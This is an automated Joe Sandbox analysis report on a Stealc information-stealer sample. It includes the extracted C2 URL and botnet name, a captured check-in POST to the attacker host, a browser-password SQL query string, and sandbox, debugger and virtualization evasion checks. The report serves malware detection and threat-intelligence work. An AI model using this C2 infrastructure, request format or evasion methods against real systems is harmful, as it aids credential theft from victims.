Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1523113
MD5:fa42e6e289aa71b35af21bb42409f81f
SHA1:e44dcb353f84af8e6c81ebb6654945898b7fbedd
SHA256:c17afe930719ca7861323d6e6fd2a8c59db8db0bce6ae487078d842105a830d7
Tags:exeuser-Bitsight
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for domain / URL
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 6928 cmdline: "C:\Users\user\Desktop\file.exe" MD5: FA42E6E289AA71B35AF21BB42409F81F)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000002.1712532051.0000000000ADE000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000000.00000003.1672169308.0000000004D90000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000000.00000002.1712704470.0000000000D31000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          Process Memory Space: file.exe PID: 6928JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            Process Memory Space: file.exe PID: 6928JoeSecurity_StealcYara detected StealcJoe Security

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              0.2.file.exe.d30000.0.unpackJoeSecurity_StealcYara detected StealcJoe Security

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-01T05:33:02.479402+020020442431Malware Command and Control Activity Detected192.168.2.449730185.215.113.3780TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: file.exeAvira: detected
                Antivirus detection for URL or domain
                Source: http://185.215.113.37/URL Reputation: Label: malware
                Source: http://185.215.113.37URL Reputation: Label: malware
                Source: http://185.215.113.37/e2b1563c6670f193.phpURL Reputation: Label: malware
                Found malware configuration
                Source: 0.2.file.exe.d30000.0.unpackMalware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
                Multi AV Scanner detection for domain / URL
                Source: http://185.215.113.37/e2b1563c6670f193.phpsVirustotal: Detection: 16%Perma Link
                Source: http://185.215.113.37/UVirustotal: Detection: 16%Perma Link
                Source: http://185.215.113.37/e2b1563c6670f193.phpCVirustotal: Detection: 16%Perma Link
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: file.exeJoe Sandbox ML: detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D3C820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,0_2_00D3C820
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D39AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_00D39AC0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D37240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_00D37240
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D39B60 CryptUnprotectData,LocalAlloc,LocalFree,0_2_00D39B60
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D48EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_00D48EA0
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D438B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_00D438B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D44910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00D44910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D3DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_00D3DA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D3E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_00D3E430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D44570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00D44570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D3ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_00D3ED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D316D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00D316D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D3F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00D3F6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D43EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00D43EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D3BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_00D3BE70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D3DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00D3DE10

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49730 -> 185.215.113.37:80
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: http://185.215.113.37/e2b1563c6670f193.php
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DHCBGDHIEBFHCBFHDHDHHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 48 43 42 47 44 48 49 45 42 46 48 43 42 46 48 44 48 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 32 42 36 39 34 34 46 33 37 31 34 34 32 39 33 39 34 34 32 32 30 0d 0a 2d 2d 2d 2d 2d 2d 44 48 43 42 47 44 48 49 45 42 46 48 43 42 46 48 44 48 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 44 48 43 42 47 44 48 49 45 42 46 48 43 42 46 48 44 48 44 48 2d 2d 0d 0a Data Ascii: ------DHCBGDHIEBFHCBFHDHDHContent-Disposition: form-data; name="hwid"92B6944F37144293944220------DHCBGDHIEBFHCBFHDHDHContent-Disposition: form-data; name="build"doma------DHCBGDHIEBFHCBFHDHDH--
                Source: Joe Sandbox ViewIP Address: 185.215.113.37 185.215.113.37
                Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D34880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_00D34880
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                Source: unknownHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DHCBGDHIEBFHCBFHDHDHHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 48 43 42 47 44 48 49 45 42 46 48 43 42 46 48 44 48 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 32 42 36 39 34 34 46 33 37 31 34 34 32 39 33 39 34 34 32 32 30 0d 0a 2d 2d 2d 2d 2d 2d 44 48 43 42 47 44 48 49 45 42 46 48 43 42 46 48 44 48 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 44 48 43 42 47 44 48 49 45 42 46 48 43 42 46 48 44 48 44 48 2d 2d 0d 0a Data Ascii: ------DHCBGDHIEBFHCBFHDHDHContent-Disposition: form-data; name="hwid"92B6944F37144293944220------DHCBGDHIEBFHCBFHDHDHContent-Disposition: form-data; name="build"doma------DHCBGDHIEBFHCBFHDHDH--
                Source: file.exe, 00000000.00000002.1712532051.0000000000ADE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37
                Source: file.exe, 00000000.00000002.1712532051.0000000000B37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/
                Source: file.exe, 00000000.00000002.1712532051.0000000000B37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/U
                Source: file.exe, 00000000.00000002.1712532051.0000000000B37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
                Source: file.exe, 00000000.00000002.1712532051.0000000000B37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpC
                Source: file.exe, 00000000.00000002.1712532051.0000000000B37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phps

                System Summary

                barindex
                PE file contains section with special chars
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010F99670_2_010F9967
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010FD9670_2_010FD967
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010780390_2_01078039
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010D20330_2_010D2033
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010F23170_2_010F2317
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010073470_2_01007347
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FDCAAC0_2_00FDCAAC
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010773900_2_01077390
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0106C2460_2_0106C246
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010F3D540_2_010F3D54
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010F15BA0_2_010F15BA
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FF86B90_2_00FF86B9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0116C7970_2_0116C797
                Source: C:\Users\user\Desktop\file.exeCode function: String function: 00D345C0 appears 316 times
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: file.exeStatic PE information: Section: eruzhrvr ZLIB complexity 0.9949714991541064
                Source: file.exeStatic PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
                Source: file.exe, 00000000.00000003.1672169308.0000000004D90000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1712704470.0000000000D31000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1
                Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@0/1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D48680 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,0_2_00D48680
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D43720 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_00D43720
                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\YDL0WP9K.htmJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: file.exe, 00000000.00000002.1712532051.0000000000ADE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT origin_url, username_value, password_value FROM logins;O
                Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: rstrtmgr.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                Source: file.exeStatic file information: File size 1820672 > 1048576
                Source: file.exeStatic PE information: Raw size of eruzhrvr is bigger than: 0x100000 < 0x196600

                Data Obfuscation

                barindex
                Detected unpacking (changes PE section rights)
                Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.d30000.0.unpack :EW;.rsrc :W;.idata :W; :EW;eruzhrvr:EW;ewcbbuan:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;eruzhrvr:EW;ewcbbuan:EW;.taggant:EW;
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D49860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00D49860
                Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                Source: file.exeStatic PE information: real checksum: 0x1bcae1 should be: 0x1bf579
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: eruzhrvr
                Source: file.exeStatic PE information: section name: ewcbbuan
                Source: file.exeStatic PE information: section name: .taggant
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0106010D push 308791EEh; mov dword ptr [esp], esi0_2_01060128
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010A412B push eax; mov dword ptr [esp], 00000000h0_2_010A415C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010A412B push esi; mov dword ptr [esp], edi0_2_010A41F9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010A412B push ebx; mov dword ptr [esp], edx0_2_010A4219
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010A412B push 657EAEE0h; mov dword ptr [esp], edi0_2_010A4242
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0117595A push 456050A1h; mov dword ptr [esp], ebp0_2_01175977
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0118A941 push edi; mov dword ptr [esp], ebx0_2_0118A968
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0118A941 push edx; mov dword ptr [esp], 2EF122B8h0_2_0118A983
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0111D171 push ecx; mov dword ptr [esp], 5597C941h0_2_0111D1A9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0111D171 push esi; mov dword ptr [esp], ebp0_2_0111D1FD
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011CC97E push 4421FFF4h; mov dword ptr [esp], ebp0_2_011CCAE5
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010F9967 push 6D29D20Dh; mov dword ptr [esp], esp0_2_010F99B3
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010F9967 push 1CE76E31h; mov dword ptr [esp], ebx0_2_010F9A5F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010F9967 push edx; mov dword ptr [esp], 787CBBB6h0_2_010F9A64
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010F9967 push ecx; mov dword ptr [esp], eax0_2_010F9AA5
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010F9967 push 18AA9848h; mov dword ptr [esp], ebx0_2_010F9ACC
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010F9967 push ecx; mov dword ptr [esp], 5FFF4A69h0_2_010F9AF5
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010F9967 push ecx; mov dword ptr [esp], ebp0_2_010F9B61
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010F9967 push ebx; mov dword ptr [esp], eax0_2_010F9C4F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010F9967 push ecx; mov dword ptr [esp], esp0_2_010F9CC7
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010F9967 push 22B235D2h; mov dword ptr [esp], eax0_2_010F9D3C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010F9967 push 1A755E40h; mov dword ptr [esp], ebp0_2_010F9E01
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010F9967 push eax; mov dword ptr [esp], ecx0_2_010F9E0D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010F9967 push eax; mov dword ptr [esp], 3CFFEFC5h0_2_010F9EE5
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010FD967 push 6DBEAB9Bh; mov dword ptr [esp], edx0_2_010FD978
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010FD967 push 5F080A0Ah; mov dword ptr [esp], eax0_2_010FDA01
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010FD967 push 7DB008ACh; mov dword ptr [esp], ebx0_2_010FDA13
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010FD967 push edi; mov dword ptr [esp], ebx0_2_010FDACC
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010FD967 push ebx; mov dword ptr [esp], ecx0_2_010FDB8E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010FD967 push edx; mov dword ptr [esp], eax0_2_010FDBAD
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010FD967 push eax; mov dword ptr [esp], esi0_2_010FDBEB
                Source: file.exeStatic PE information: section name: eruzhrvr entropy: 7.953491932636083

                Boot Survival

                barindex
                Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D49860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00D49860

                Malware Analysis System Evasion

                barindex
                Found evasive API chain (may stop execution after checking locale)
                Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_0-13267
                Tries to detect sandboxes / dynamic malware analysis system (registry check)
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                Tries to detect virtualization through RDTSC time measurements
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F91A9B second address: F91AB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b je 00007F43F0D1038Ch 0x00000011 ja 00007F43F0D10386h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1103C5E second address: 1103C67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push esi 0x00000007 pop esi 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F386E second address: 10F3873 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1102BE0 second address: 1102BF7 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jnc 00007F43F0D0DC66h 0x00000009 push edx 0x0000000a pop edx 0x0000000b pop esi 0x0000000c pushad 0x0000000d je 00007F43F0D0DC66h 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1102D57 second address: 1102D5B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110304E second address: 110306F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jng 00007F43F0D0DC66h 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F43F0D0DC73h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11031D9 second address: 11031FD instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F43F0D10393h 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jc 00007F43F0D10386h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11031FD second address: 1103210 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007F43F0D0DC6Ch 0x0000000c rdtsc
